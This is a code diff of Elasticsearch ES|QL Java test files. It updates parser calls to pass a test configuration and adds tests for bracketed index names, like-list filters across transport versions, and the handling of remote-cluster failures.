a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/AbstractStatementParserTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/AbstractStatementParserTests.java index 462b9f7373ecf..07ab624e4a2a9 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/AbstractStatementParserTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/AbstractStatementParserTests.java @@ -11,6 +11,7 @@ import org.elasticsearch.common.lucene.BytesRefs; import org.elasticsearch.index.IndexMode; import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.xpack.esql.EsqlTestUtils; import org.elasticsearch.xpack.esql.VerificationException; import org.elasticsearch.xpack.esql.core.expression.Expression; import org.elasticsearch.xpack.esql.core.expression.Literal; @@ -57,11 +58,11 @@ LogicalPlan statement(String e) { } LogicalPlan statement(String e, QueryParams params) { - return parser.createStatement(e, params); + return parser.createStatement(e, params, EsqlTestUtils.TEST_CFG); } LogicalPlan processingCommand(String e) { - return parser.createStatement("row a = 1 | " + e); + return parser.createStatement("row a = 1 | " + e, EsqlTestUtils.TEST_CFG); } static UnresolvedAttribute attribute(String name) { @@ -170,7 +171,7 @@ void expectVerificationError(String query, String errorMessage) { "Query [" + query + "] is expected to throw " + VerificationException.class + " with message [" + errorMessage + "]", VerificationException.class, containsString(errorMessage), - () -> parser.createStatement(query) + () -> parser.createStatement(query, EsqlTestUtils.TEST_CFG) ); } diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/ExpressionTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/ExpressionTests.java index c39dc70f3ad39..0696f2c99e03e 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/ExpressionTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/ExpressionTests.java @@ -9,6 +9,7 @@ import org.elasticsearch.common.lucene.BytesRefs; import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.xpack.esql.EsqlTestUtils; import org.elasticsearch.xpack.esql.core.expression.Alias; import org.elasticsearch.xpack.esql.core.expression.Expression; import org.elasticsearch.xpack.esql.core.expression.FoldContext; @@ -659,7 +660,7 @@ private Project projectExpression(String e) { } private LogicalPlan parse(String s) { - return parser.createStatement(s); + return parser.createStatement(s, EsqlTestUtils.TEST_CFG); } private Literal l(Object value, DataType type) { diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/GrammarInDevelopmentParsingTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/GrammarInDevelopmentParsingTests.java index f31d9ee58c268..14ded33e297ee 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/GrammarInDevelopmentParsingTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/GrammarInDevelopmentParsingTests.java @@ -8,6 +8,7 @@ package org.elasticsearch.xpack.esql.parser; import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.xpack.esql.EsqlTestUtils; import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.not; @@ -35,7 +36,7 @@ public void testDevelopmentRerank() { } void parse(String query, String errorMessage) { - ParsingException pe = expectThrows(ParsingException.class, () -> parser().createStatement(query)); + ParsingException pe = expectThrows(ParsingException.class, () -> parser().createStatement(query, EsqlTestUtils.TEST_CFG)); assertThat(pe.getMessage(), containsString("mismatched input '" + errorMessage + "'")); // check the parser eliminated the DEV_ tokens from the message assertThat(pe.getMessage(), not(containsString("DEV_"))); diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/StatementParserTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/StatementParserTests.java index 108059ac2c883..c2ce416a90c8a 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/StatementParserTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/parser/StatementParserTests.java @@ -13,6 +13,7 @@ import org.elasticsearch.common.lucene.BytesRefs; import org.elasticsearch.core.Tuple; import org.elasticsearch.index.IndexMode; +import org.elasticsearch.xpack.esql.EsqlTestUtils; import org.elasticsearch.xpack.esql.action.EsqlCapabilities; import org.elasticsearch.xpack.esql.core.capabilities.UnresolvedException; import org.elasticsearch.xpack.esql.core.expression.Alias; @@ -945,10 +946,6 @@ public void testBasicLimitCommand() { assertThat(limit.children().get(0).children().get(0), instanceOf(UnresolvedRelation.class)); } - public void testLimitConstraints() { - expectError("from text | limit -1", "line 1:13: Invalid value for LIMIT [-1], expecting a non negative integer"); - } - public void testBasicSortCommand() { LogicalPlan plan = statement("from text | where true | sort a+b asc nulls first, x desc nulls last | sort y asc | sort z desc"); assertThat(plan, instanceOf(OrderBy.class)); @@ -3176,7 +3173,7 @@ public void testValidJoinPattern() { } public void testInvalidFromPatterns() { - var sourceCommands = new String[] { "FROM", "TS" }; + var sourceCommands = Build.current().isSnapshot() ? new String[] { "FROM", "TS" } : new String[] { "FROM" }; var indexIsBlank = "Blank index specified in index pattern"; var remoteIsEmpty = "remote part is empty"; var invalidDoubleColonUsage = "invalid usage of :: separator"; @@ -3839,7 +3836,7 @@ public void testRerankWithPositionalParameters() { List.of(paramAsConstant(null, "query text"), paramAsConstant(null, "reranker"), paramAsConstant(null, "rerank_score")) ); var rerank = as( - parser.createStatement("row a = 1 | RERANK ? ON title WITH inferenceId=?, scoreColumn=? ", queryParams), + parser.createStatement("row a = 1 | RERANK ? ON title WITH inferenceId=?, scoreColumn=? ", queryParams, EsqlTestUtils.TEST_CFG), Rerank.class ); @@ -3862,7 +3859,8 @@ public void testRerankWithNamedParameters() { var rerank = as( parser.createStatement( "row a = 1 | RERANK ?queryText ON title WITH inferenceId=?inferenceId, scoreColumn=?scoreColumnName", - queryParams + queryParams, + EsqlTestUtils.TEST_CFG ), Rerank.class ); @@ -3910,7 +3908,10 @@ public void testCompletionDefaultFieldName() { public void testCompletionWithPositionalParameters() { var queryParams = new QueryParams(List.of(paramAsConstant(null, "inferenceId"))); - var plan = as(parser.createStatement("row a = 1 | COMPLETION prompt_field WITH ?", queryParams), Completion.class); + var plan = as( + parser.createStatement("row a = 1 | COMPLETION prompt_field WITH ?", queryParams, EsqlTestUtils.TEST_CFG), + Completion.class + ); assertThat(plan.prompt(), equalTo(attribute("prompt_field"))); assertThat(plan.inferenceId(), equalTo(literalString("inferenceId"))); @@ -3919,7 +3920,10 @@ public void testCompletionWithPositionalParameters() { public void testCompletionWithNamedParameters() { var queryParams = new QueryParams(List.of(paramAsConstant("inferenceId", "myInference"))); - var plan = as(parser.createStatement("row a = 1 | COMPLETION prompt_field WITH ?inferenceId", queryParams), Completion.class); + var plan = as( + parser.createStatement("row a = 1 | COMPLETION prompt_field WITH ?inferenceId", queryParams, EsqlTestUtils.TEST_CFG), + Completion.class + ); assertThat(plan.prompt(), equalTo(attribute("prompt_field"))); assertThat(plan.inferenceId(), equalTo(literalString("myInference"))); @@ -4733,4 +4737,74 @@ public void testUnclosedParenthesis() { expectError(q, "Invalid query"); } } + + public void testBracketsInIndexNames() { + + List patterns = List.of( + "(", + ")", + "()", + "(((", + ")))", + "(test", + "test)", + "(test)", + "te()st", + "concat(foo,bar)", + "((((()))))", + "(((abc)))", + "*()*", + "*test()*" + ); + + for (String pattern : patterns) { + expectErrorForBracketsWithoutQuotes(pattern); + expectSuccessForBracketsWithinQuotes(pattern); + } + + expectError("from test)", "line 1:10: extraneous input ')' expecting "); + expectError("from te()st", "line 1:8: token recognition error at: '('"); + expectError("from test | enrich foo)", "line -1:-1: Invalid query [from test | enrich foo)]"); + expectError("from test | lookup join foo) on bar", "line 1:28: token recognition error at: ')'"); + } + + private void expectErrorForBracketsWithoutQuotes(String pattern) { + expectThrows(ParsingException.class, () -> processingCommand("from " + pattern)); + + expectThrows(ParsingException.class, () -> processingCommand("from *:" + pattern)); + + expectThrows(ParsingException.class, () -> processingCommand("from remote1:" + pattern + ",remote2:" + pattern)); + + expectThrows(ParsingException.class, () -> processingCommand("from test | lookup join " + pattern + " on bar")); + + expectThrows(ParsingException.class, () -> processingCommand("from test | enrich " + pattern)); + } + + private void expectSuccessForBracketsWithinQuotes(String indexName) { + LogicalPlan plan = statement("from \"" + indexName + "\""); + UnresolvedRelation from = as(plan, UnresolvedRelation.class); + assertThat(from.indexPattern().indexPattern(), is(indexName)); + + plan = statement("from \"*:" + indexName + "\""); + from = as(plan, UnresolvedRelation.class); + assertThat(from.indexPattern().indexPattern(), is("*:" + indexName)); + + plan = statement("from \"remote1:" + indexName + ",remote2:" + indexName + "\""); + from = as(plan, UnresolvedRelation.class); + assertThat(from.indexPattern().indexPattern(), is("remote1:" + indexName + ",remote2:" + indexName)); + + plan = statement("from test | enrich \"" + indexName + "\""); + Enrich enrich = as(plan, Enrich.class); + assertThat(enrich.policyName().fold(FoldContext.small()), is(BytesRefs.toBytesRef(indexName))); + as(enrich.child(), UnresolvedRelation.class); + + if (indexName.contains("*")) { + expectThrows(ParsingException.class, () -> processingCommand("from test | lookup join \"" + indexName + "\" on bar")); + } else { + plan = statement("from test | lookup join \"" + indexName + "\" on bar"); + LookupJoin lookup = as(plan, LookupJoin.class); + UnresolvedRelation right = as(lookup.right(), UnresolvedRelation.class); + assertThat(right.indexPattern().indexPattern(), is(indexName)); + } + } } diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/planner/FilterTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/planner/FilterTests.java index 04d2cac31af55..f29d3928384b9 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/planner/FilterTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/planner/FilterTests.java @@ -7,6 +7,7 @@ package org.elasticsearch.xpack.esql.planner; +import org.elasticsearch.TransportVersion; import org.elasticsearch.common.bytes.BytesReference; import org.elasticsearch.common.io.stream.ByteBufferStreamInput; import org.elasticsearch.common.io.stream.BytesStreamOutput; @@ -28,8 +29,10 @@ import org.elasticsearch.xpack.esql.expression.function.EsqlFunctionRegistry; import org.elasticsearch.xpack.esql.index.EsIndex; import org.elasticsearch.xpack.esql.index.IndexResolution; +import org.elasticsearch.xpack.esql.io.stream.ExpressionQueryBuilder; import org.elasticsearch.xpack.esql.io.stream.PlanStreamInput; import org.elasticsearch.xpack.esql.io.stream.PlanStreamOutput; +import org.elasticsearch.xpack.esql.io.stream.PlanStreamWrapperQueryBuilder; import org.elasticsearch.xpack.esql.optimizer.LogicalPlanOptimizer; import org.elasticsearch.xpack.esql.optimizer.PhysicalOptimizerContext; import org.elasticsearch.xpack.esql.optimizer.PhysicalPlanOptimizer; @@ -37,6 +40,7 @@ import org.elasticsearch.xpack.esql.plan.physical.FragmentExec; import org.elasticsearch.xpack.esql.plan.physical.PhysicalPlan; import org.elasticsearch.xpack.esql.planner.mapper.Mapper; +import org.elasticsearch.xpack.esql.plugin.EsqlFlags; import org.elasticsearch.xpack.esql.querydsl.query.SingleValueQuery; import org.elasticsearch.xpack.esql.session.Configuration; import org.junit.BeforeClass; @@ -45,8 +49,10 @@ import java.io.UncheckedIOException; import java.util.List; import java.util.Map; +import java.util.Set; import static java.util.Arrays.asList; +import static org.elasticsearch.TransportVersions.V_8_17_0; import static org.elasticsearch.index.query.QueryBuilders.rangeQuery; import static org.elasticsearch.xpack.esql.ConfigurationTestUtils.randomConfiguration; import static org.elasticsearch.xpack.esql.EsqlTestUtils.TEST_VERIFIER; @@ -65,6 +71,7 @@ public class FilterTests extends ESTestCase { // use a field that already exists in the mapping private static final String EMP_NO = "emp_no"; + private static final String LAST_NAME = "last_name"; private static final String OTHER_FIELD = "salary"; private static EsqlParser parser; @@ -104,7 +111,7 @@ public void testTimestampRequestFilterNoQueryFilter() { |WHERE {} > 10 """, OTHER_FIELD), restFilter); - var filter = filterQueryForTransportNodes(plan); + var filter = filterQueryForTransportNodes(TransportVersion.current(), plan); assertEquals(restFilter.toString(), filter.toString()); } @@ -117,7 +124,7 @@ public void testTimestampNoRequestFilterQueryFilter() { """, EMP_NO, value); var plan = plan(query, null); - var filter = filterQueryForTransportNodes(plan); + var filter = filterQueryForTransportNodes(TransportVersion.current(), plan); var expected = singleValueQuery(query, unscore(rangeQuery(EMP_NO).gt(value)), EMP_NO, ((SingleValueQuery.Builder) filter).source()); assertEquals(expected.toString(), filter.toString()); } @@ -132,7 +139,7 @@ public void testTimestampRequestFilterQueryFilter() { """, EMP_NO, value); var plan = plan(query, restFilter); - var filter = filterQueryForTransportNodes(plan); + var filter = filterQueryForTransportNodes(TransportVersion.current(), plan); var builder = ((BoolQueryBuilder) filter).filter().get(1); var queryFilter = singleValueQuery( query, @@ -155,7 +162,7 @@ public void testTimestampRequestFilterQueryFilterWithConjunction() { """, EMP_NO, lowValue, EMP_NO, highValue); var plan = plan(query, restFilter); - var filter = filterQueryForTransportNodes(plan); + var filter = filterQueryForTransportNodes(TransportVersion.current(), plan); var musts = ((BoolQueryBuilder) ((BoolQueryBuilder) filter).filter().get(1)).must(); var left = singleValueQuery( query, @@ -184,7 +191,7 @@ public void testTimestampRequestFilterQueryFilterWithDisjunctionOnDifferentField |WHERE {} > {} OR {} < {} """, OTHER_FIELD, lowValue, EMP_NO, highValue), restFilter); - var filter = filterQueryForTransportNodes(plan); + var filter = filterQueryForTransportNodes(TransportVersion.current(), plan); var expected = restFilter; assertEquals(expected.toString(), filter.toString()); } @@ -200,7 +207,7 @@ public void testTimestampRequestFilterQueryFilterWithDisjunctionOnSameField() { """, EMP_NO, lowValue, EMP_NO, highValue); var plan = plan(query, restFilter); - var filter = filterQueryForTransportNodes(plan); + var filter = filterQueryForTransportNodes(TransportVersion.current(), plan); var shoulds = ((BoolQueryBuilder) ((BoolQueryBuilder) filter).filter().get(1)).should(); var left = singleValueQuery( query, @@ -231,7 +238,7 @@ public void testTimestampRequestFilterQueryFilterWithMultiConjunction() { """, EMP_NO, lowValue, OTHER_FIELD, eqValue, EMP_NO, highValue); var plan = plan(query, restFilter); - var filter = filterQueryForTransportNodes(plan); + var filter = filterQueryForTransportNodes(TransportVersion.current(), plan); var musts = ((BoolQueryBuilder) ((BoolQueryBuilder) filter).filter().get(1)).must(); var left = singleValueQuery( query, @@ -265,7 +272,7 @@ public void testTimestampRequestFilterQueryMultipleFilters() { """, EMP_NO, lowValue, EMP_NO, eqValue, EMP_NO, highValue); var plan = plan(query, restFilter); - var filter = filterQueryForTransportNodes(plan); + var filter = filterQueryForTransportNodes(TransportVersion.current(), plan); var builder = ((BoolQueryBuilder) filter).filter().get(1); var queryFilter = singleValueQuery( query, @@ -286,7 +293,7 @@ public void testTimestampOverriddenFilterFilter() { |WHERE {} > {} """, EMP_NO, OTHER_FIELD, EMP_NO, eqValue), null); - var filter = filterQueryForTransportNodes(plan); + var filter = filterQueryForTransportNodes(TransportVersion.current(), plan); assertThat(filter, nullValue()); } @@ -298,7 +305,7 @@ public void testTimestampAsFunctionArgument() { |WHERE to_int(to_string({})) == {} """, EMP_NO, eqValue), null); - var filter = filterQueryForTransportNodes(plan); + var filter = filterQueryForTransportNodes(TransportVersion.current(), plan); assertThat(filter, nullValue()); } @@ -310,10 +317,43 @@ public void testTimestampAsFunctionArgumentInsideExpression() { |WHERE to_int(to_string({})) + 987 == {} """, EMP_NO, eqValue), null); - var filter = filterQueryForTransportNodes(plan); + var filter = filterQueryForTransportNodes(TransportVersion.current(), plan); assertThat(filter, nullValue()); } + public void testLikeList() { + String query = LoggerMessageFormat.format(null, """ + FROM test + |WHERE {} LIKE ("a+", "b+") + """, LAST_NAME); + var plan = plan(query, null); + // test with an older version, so like list is not supported + var filter = filterQueryForTransportNodes(V_8_17_0, plan); + assertNull(filter); + } + + /** + * Tests that we can extract a filter if the transport + * version is {@code null}. This isn't run in the "filter for transport nodes" + * code path. Instead, it's in the "filter for the local node" path, but + * we can get a quick test of that by calling this setup. + */ + public void testLikeListNullTransportVersion() { + String query = LoggerMessageFormat.format(null, """ + FROM test + |WHERE {} LIKE ("a+", "b+") + """, LAST_NAME); + var plan = plan(query, null); + + PlanStreamWrapperQueryBuilder filterWrapper = (PlanStreamWrapperQueryBuilder) filterQueryForTransportNodes(null, plan); + SingleValueQuery.Builder filter = (SingleValueQuery.Builder) filterWrapper.next(); + assertEquals(LAST_NAME, filter.fieldName()); + ExpressionQueryBuilder innerFilter = (ExpressionQueryBuilder) filter.next(); + assertEquals(LAST_NAME, innerFilter.fieldName()); + assertEquals(""" + last_name LIKE ("a+", "b+")""", innerFilter.getExpression().toString()); + } + /** * Ugly hack to create a QueryBuilder for SingleValueQuery. * For some reason however the queryName is set to null on range queries when deserializing. @@ -342,7 +382,7 @@ public static QueryBuilder singleValueQuery(String query, QueryBuilder inner, St } private PhysicalPlan plan(String query, QueryBuilder restFilter) { - var logical = logicalOptimizer.optimize(analyzer.analyze(parser.createStatement(query))); + var logical = logicalOptimizer.optimize(analyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); // System.out.println("Logical\n" + logical); var physical = mapper.map(logical); // System.out.println("physical\n" + physical); @@ -360,8 +400,8 @@ private QueryBuilder restFilterQuery(String field) { return unscore(rangeQuery(field).lt("2020-12-34")); } - private QueryBuilder filterQueryForTransportNodes(PhysicalPlan plan) { - return PlannerUtils.detectFilter(plan, EMP_NO::equals); + private QueryBuilder filterQueryForTransportNodes(TransportVersion minTransportVersion, PhysicalPlan plan) { + return PlannerUtils.detectFilter(new EsqlFlags(true), null, minTransportVersion, plan, Set.of(EMP_NO, LAST_NAME)::contains); } @Override diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/planner/LocalExecutionPlannerTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/planner/LocalExecutionPlannerTests.java index 9bc2118c0451f..b56f4a3a4898b 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/planner/LocalExecutionPlannerTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/planner/LocalExecutionPlannerTests.java @@ -19,11 +19,12 @@ import org.apache.lucene.tests.index.RandomIndexWriter; import org.elasticsearch.cluster.ClusterName; import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.common.unit.ByteSizeValue; import org.elasticsearch.common.util.BigArrays; import org.elasticsearch.compute.lucene.DataPartitioning; import org.elasticsearch.compute.lucene.LuceneSourceOperator; import org.elasticsearch.compute.lucene.LuceneTopNSourceOperator; -import org.elasticsearch.compute.lucene.ValuesSourceReaderOperator; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperator; import org.elasticsearch.compute.operator.SourceOperator; import org.elasticsearch.compute.test.NoOpReleasable; import org.elasticsearch.compute.test.TestBlockFactory; @@ -340,7 +341,12 @@ private Configuration config() { } private EsPhysicalOperationProviders esPhysicalOperationProviders(List shardContexts) { - return new EsPhysicalOperationProviders(FoldContext.small(), shardContexts, null, DataPartitioning.AUTO); + return new EsPhysicalOperationProviders( + FoldContext.small(), + shardContexts, + null, + new PhysicalSettings(DataPartitioning.AUTO, ByteSizeValue.ofMb(1)) + ); } private List createShardContexts() throws IOException { diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/plugin/ClusterRequestTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/plugin/ClusterRequestTests.java index ababc8ed37657..65587cf4d6876 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/plugin/ClusterRequestTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/plugin/ClusterRequestTests.java @@ -201,7 +201,7 @@ static LogicalPlan parse(String query) { ), TEST_VERIFIER ); - return logicalOptimizer.optimize(analyzer.analyze(new EsqlParser().createStatement(query))); + return logicalOptimizer.optimize(analyzer.analyze(new EsqlParser().createStatement(query, EsqlTestUtils.TEST_CFG))); } @Override diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/plugin/DataNodeRequestSerializationTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/plugin/DataNodeRequestSerializationTests.java index 1fc481711df97..fe0e028db4c9c 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/plugin/DataNodeRequestSerializationTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/plugin/DataNodeRequestSerializationTests.java @@ -302,7 +302,7 @@ static LogicalPlan parse(String query) { ), TEST_VERIFIER ); - return logicalOptimizer.optimize(analyzer.analyze(new EsqlParser().createStatement(query))); + return logicalOptimizer.optimize(analyzer.analyze(new EsqlParser().createStatement(query, EsqlTestUtils.TEST_CFG))); } static PhysicalPlan mapAndMaybeOptimize(LogicalPlan logicalPlan) { diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/session/EsqlCCSUtilsTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/session/EsqlCCSUtilsTests.java index 2d488d7e41ee8..e2338a12f6179 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/session/EsqlCCSUtilsTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/session/EsqlCCSUtilsTests.java @@ -152,7 +152,7 @@ public void testUpdateExecutionInfoWithUnavailableClusters() { executionInfo.swapCluster(REMOTE2_ALIAS, (k, v) -> new EsqlExecutionInfo.Cluster(REMOTE2_ALIAS, "mylogs1,mylogs2,logs*", true)); var failure = new FieldCapabilitiesFailure(new String[] { "logs-a" }, new NoSeedNodeLeftException("unable to connect")); - var unvailableClusters = Map.of(REMOTE1_ALIAS, failure, REMOTE2_ALIAS, failure); + var unvailableClusters = Map.of(REMOTE1_ALIAS, List.of(failure), REMOTE2_ALIAS, List.of(failure)); EsqlCCSUtils.updateExecutionInfoWithUnavailableClusters(executionInfo, unvailableClusters); assertThat(executionInfo.clusterAliases(), equalTo(Set.of(LOCAL_CLUSTER_ALIAS, REMOTE1_ALIAS, REMOTE2_ALIAS))); @@ -184,7 +184,7 @@ public void testUpdateExecutionInfoWithUnavailableClusters() { var failure = new FieldCapabilitiesFailure(new String[] { "logs-a" }, new NoSeedNodeLeftException("unable to connect")); RemoteTransportException e = expectThrows( RemoteTransportException.class, - () -> EsqlCCSUtils.updateExecutionInfoWithUnavailableClusters(executionInfo, Map.of(REMOTE2_ALIAS, failure)) + () -> EsqlCCSUtils.updateExecutionInfoWithUnavailableClusters(executionInfo, Map.of(REMOTE2_ALIAS, List.of(failure))) ); assertThat(e.status().getStatus(), equalTo(500)); assertThat( @@ -253,7 +253,7 @@ public void testUpdateExecutionInfoWithClustersWithNoMatchingIndices() { ) ); - IndexResolution indexResolution = IndexResolution.valid(esIndex, esIndex.concreteIndices(), Set.of(), Map.of()); + IndexResolution indexResolution = IndexResolution.valid(esIndex, esIndex.concreteIndices(), Map.of()); EsqlCCSUtils.updateExecutionInfoWithClustersWithNoMatchingIndices(executionInfo, indexResolution); @@ -296,8 +296,7 @@ public void testUpdateExecutionInfoWithClustersWithNoMatchingIndices() { IndexMode.STANDARD ) ); - Map unavailableClusters = Map.of(); - IndexResolution indexResolution = IndexResolution.valid(esIndex, esIndex.concreteIndices(), Set.of(), unavailableClusters); + IndexResolution indexResolution = IndexResolution.valid(esIndex, esIndex.concreteIndices(), Map.of()); EsqlCCSUtils.updateExecutionInfoWithClustersWithNoMatchingIndices(executionInfo, indexResolution); @@ -338,8 +337,8 @@ public void testUpdateExecutionInfoWithClustersWithNoMatchingIndices() { ); // remote1 is unavailable var failure = new FieldCapabilitiesFailure(new String[] { "logs-a" }, new NoSeedNodeLeftException("unable to connect")); - Map unavailableClusters = Map.of(REMOTE1_ALIAS, failure); - IndexResolution indexResolution = IndexResolution.valid(esIndex, esIndex.concreteIndices(), Set.of(), unavailableClusters); + var failures = Map.of(REMOTE1_ALIAS, List.of(failure)); + IndexResolution indexResolution = IndexResolution.valid(esIndex, esIndex.concreteIndices(), failures); EsqlCCSUtils.updateExecutionInfoWithClustersWithNoMatchingIndices(executionInfo, indexResolution); @@ -349,9 +348,8 @@ public void testUpdateExecutionInfoWithClustersWithNoMatchingIndices() { EsqlExecutionInfo.Cluster remote1Cluster = executionInfo.getCluster(REMOTE1_ALIAS); assertThat(remote1Cluster.getIndexExpression(), equalTo("*")); - // since remote1 is in the unavailable Map (passed to IndexResolution.valid), it's status will not be changed - // by updateExecutionInfoWithClustersWithNoMatchingIndices (it is handled in updateExecutionInfoWithUnavailableClusters) - assertThat(remote1Cluster.getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.RUNNING)); + // since remote1 is in the failures Map (passed to IndexResolution.valid), + assertThat(remote1Cluster.getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.SKIPPED)); EsqlExecutionInfo.Cluster remote2Cluster = executionInfo.getCluster(REMOTE2_ALIAS); assertThat(remote2Cluster.getIndexExpression(), equalTo("mylogs1*,mylogs2*,logs*")); @@ -381,8 +379,8 @@ public void testUpdateExecutionInfoWithClustersWithNoMatchingIndices() { ); var failure = new FieldCapabilitiesFailure(new String[] { "logs-a" }, new NoSeedNodeLeftException("unable to connect")); - Map unavailableClusters = Map.of(REMOTE1_ALIAS, failure); - IndexResolution indexResolution = IndexResolution.valid(esIndex, esIndex.concreteIndices(), Set.of(), unavailableClusters); + var failures = Map.of(REMOTE1_ALIAS, List.of(failure)); + IndexResolution indexResolution = IndexResolution.valid(esIndex, esIndex.concreteIndices(), failures); EsqlCCSUtils.updateExecutionInfoWithClustersWithNoMatchingIndices(executionInfo, indexResolution); EsqlExecutionInfo.Cluster localCluster = executionInfo.getCluster(LOCAL_CLUSTER_ALIAS); @@ -390,9 +388,8 @@ public void testUpdateExecutionInfoWithClustersWithNoMatchingIndices() { assertClusterStatusAndShardCounts(localCluster, EsqlExecutionInfo.Cluster.Status.RUNNING); EsqlExecutionInfo.Cluster remote1Cluster = executionInfo.getCluster(REMOTE1_ALIAS); - // since remote1 is in the unavailable Map (passed to IndexResolution.valid), it's status will not be changed - // by updateExecutionInfoWithClustersWithNoMatchingIndices (it is handled in updateExecutionInfoWithUnavailableClusters) - assertThat(remote1Cluster.getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.RUNNING)); + // skipped since remote1 is in the failures Map + assertThat(remote1Cluster.getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.SKIPPED)); EsqlExecutionInfo.Cluster remote2Cluster = executionInfo.getCluster(REMOTE2_ALIAS); assertThat(remote2Cluster.getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.SKIPPED)); @@ -430,8 +427,8 @@ public void testUpdateExecutionInfoWithClustersWithNoMatchingIndices() { // remote1 is unavailable var failure = new FieldCapabilitiesFailure(new String[] { "logs-a" }, new NoSeedNodeLeftException("unable to connect")); - Map unavailableClusters = Map.of(REMOTE1_ALIAS, failure); - IndexResolution indexResolution = IndexResolution.valid(esIndex, esIndex.concreteIndices(), Set.of(), unavailableClusters); + var failures = Map.of(REMOTE1_ALIAS, List.of(failure)); + IndexResolution indexResolution = IndexResolution.valid(esIndex, esIndex.concreteIndices(), failures); EsqlCCSUtils.updateExecutionInfoWithClustersWithNoMatchingIndices(executionInfo, indexResolution); @@ -441,9 +438,8 @@ public void testUpdateExecutionInfoWithClustersWithNoMatchingIndices() { EsqlExecutionInfo.Cluster remote1Cluster = executionInfo.getCluster(REMOTE1_ALIAS); assertThat(remote1Cluster.getIndexExpression(), equalTo("*")); - // since remote1 is in the unavailable Map (passed to IndexResolution.valid), it's status will not be changed - // by updateExecutionInfoWithClustersWithNoMatchingIndices (it is handled in updateExecutionInfoWithUnavailableClusters) - assertThat(remote1Cluster.getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.RUNNING)); + // skipped since remote1 is in the failures Map + assertThat(remote1Cluster.getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.SKIPPED)); EsqlExecutionInfo.Cluster remote2Cluster = executionInfo.getCluster(REMOTE2_ALIAS); assertThat(remote2Cluster.getIndexExpression(), equalTo("mylogs1*,mylogs2*,logs*")); @@ -463,7 +459,9 @@ public void testDetermineUnavailableRemoteClusters() { ) ); - Map unavailableClusters = EsqlCCSUtils.determineUnavailableRemoteClusters(failures); + Map unavailableClusters = EsqlCCSUtils.determineUnavailableRemoteClusters( + EsqlCCSUtils.groupFailuresPerCluster(failures) + ); assertThat(unavailableClusters.keySet(), equalTo(Set.of("remote1", "remote2"))); } @@ -473,7 +471,8 @@ public void testDetermineUnavailableRemoteClusters() { failures.add(new FieldCapabilitiesFailure(new String[] { "remote2:mylogs1" }, new NoSuchRemoteClusterException("remote2"))); failures.add(new FieldCapabilitiesFailure(new String[] { "remote2:mylogs1" }, new NoSeedNodeLeftException("no seed node"))); - Map unavailableClusters = EsqlCCSUtils.determineUnavailableRemoteClusters(failures); + var groupedFailures = EsqlCCSUtils.groupFailuresPerCluster(failures); + Map unavailableClusters = EsqlCCSUtils.determineUnavailableRemoteClusters(groupedFailures); assertThat(unavailableClusters.keySet(), equalTo(Set.of("remote2"))); } @@ -487,7 +486,8 @@ public void testDetermineUnavailableRemoteClusters() { new IllegalStateException("Unable to open any connections") ) ); - Map unavailableClusters = EsqlCCSUtils.determineUnavailableRemoteClusters(failures); + var groupedFailures = EsqlCCSUtils.groupFailuresPerCluster(failures); + Map unavailableClusters = EsqlCCSUtils.determineUnavailableRemoteClusters(groupedFailures); assertThat(unavailableClusters.keySet(), 